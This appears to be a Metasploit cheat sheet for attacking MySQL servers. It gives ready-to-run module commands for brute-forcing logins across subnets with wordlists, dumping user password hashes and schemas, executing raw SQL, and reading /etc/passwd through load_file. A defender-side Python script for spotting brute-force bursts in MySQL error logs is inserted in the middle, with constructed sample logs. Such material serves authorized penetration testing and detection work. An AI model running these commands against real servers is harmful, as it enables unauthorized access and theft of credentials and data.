MySQL Pentest using Metasploit
MySQL Enumeration
use auxiliary/scanner/mysql/mysql_version
run mysql://127.0.0.1
MySQL Login / Bruteforce
MySQL credentials to validate
use auxiliary/scanner/mysql/mysql_login
run 'mysql://root: a b c [email protected]'
Re-using MySQL credentials in a subnet
use auxiliary/scanner/mysql/mysql_login
run cidr:/24:mysql://user:[email protected] threads=50
Using an alternative port
use auxiliary/scanner/mysql/mysql_login
run mysql://user:[email protected]:2222
Brute-force host with known user and password list:
use auxiliary/scanner/mysql/mysql_login
run mysql://[email protected] threads=50 pass_file=./wordlist.txt
Brute-force credentials:
use auxiliary/scanner/mysql/mysql_login
run mysql://192.168.222.1 threads=50 user_file=./users.txt pass_file=./wordlist.txt
Brute-force credentials in a subnet:
use auxiliary/scanner/mysql/mysql_login
run cidr:/24:mysql://user:[email protected] threads=50
run cidr:/24:mysql://[email protected] threads=50 pass_file=./wordlist.txt
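A mysql_login run with threads=50 and a wordlist leaves a dense burst of "Access denied for user" lines in the target's MySQL error log; the following Python is an added defender-side check for that burst (it is not part of this cheat sheet or of Metasploit). Only the "Access denied for user ..." message text is MySQL's; the timestamp/thread/level layout around it and the sample log lines are assumed and constructed here.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# MySQL's "Access denied" message text is real; the timestamp/thread/level layout
# around it is assumed (it varies by version and log_error_verbosity).
ACCESS_DENIED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})\S*\s.*?"
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']+)'"
)

def parse_failures(lines):
    """Yield (timestamp, user, source_host) for every failed-login line."""
    for line in lines:
        m = ACCESS_DENIED.search(line)
        if m:
            yield datetime.fromisoformat(m.group("ts")), m.group("user"), m.group("host")

def find_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {source_host: (max_failures_in_window, distinct_users)} for sources
    with >= threshold failures inside any sliding window. A mysql_login run with
    user_file/pass_file shows up as a high count and several user names."""
    per_host = defaultdict(list)
    for ts, user, host in parse_failures(lines):
        per_host[host].append((ts, user))
    alerts = {}
    for host, events in per_host.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            count = end - start + 1
            if count >= threshold and count > alerts.get(host, (0,))[0]:
                alerts[host] = (count, {u for _, u in events[start:end + 1]})
    return alerts

# Constructed sample log: a 12-second burst from one source, plus noise.
SAMPLE_LOG = [
    f"2024-05-01T10:00:{i:02d}.000000Z {100 + i} [Warning] Access denied for user "
    f"'{u}'@'192.168.222.1' (using password: YES)"
    for i, u in enumerate(["root", "admin", "root", "mysql", "root", "backup",
                           "root", "admin", "dev", "root", "test", "root"])
] + [
    "2024-05-01T10:05:00.000000Z 200 [Warning] Access denied for user "
    "'alice'@'10.0.0.7' (using password: YES)",
    "2024-05-01T10:05:01.000000Z 201 [Note] Unrelated server message",
]
```

Calling find_bruteforce(SAMPLE_LOG) flags 192.168.222.1 with 12 failures across six user names and leaves the single failure from 10.0.0.7 alone; lower the threshold or widen the window to suit the server's normal failure rate.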
MySQL Dumping
User and hash dump:
use auxiliary/scanner/mysql/mysql_hashdump
run 'mysql://root: a b c [email protected]'
Schema dump:
use auxiliary/scanner/mysql/mysql_schemadump
run 'mysql://root: a b c [email protected]'
MySQL Querying
Execute raw SQL:
use admin/mysql/mysql_sql
run 'mysql://root: a b c [email protected]' sql='select version()'
Load a file from the file system (requires FILE privilege and a secure_file_priv setting that allows it):
use admin/mysql/mysql_sql
run 'mysql://root: a b c [email protected]' sql='select load_file(\'/etc/passwd\')'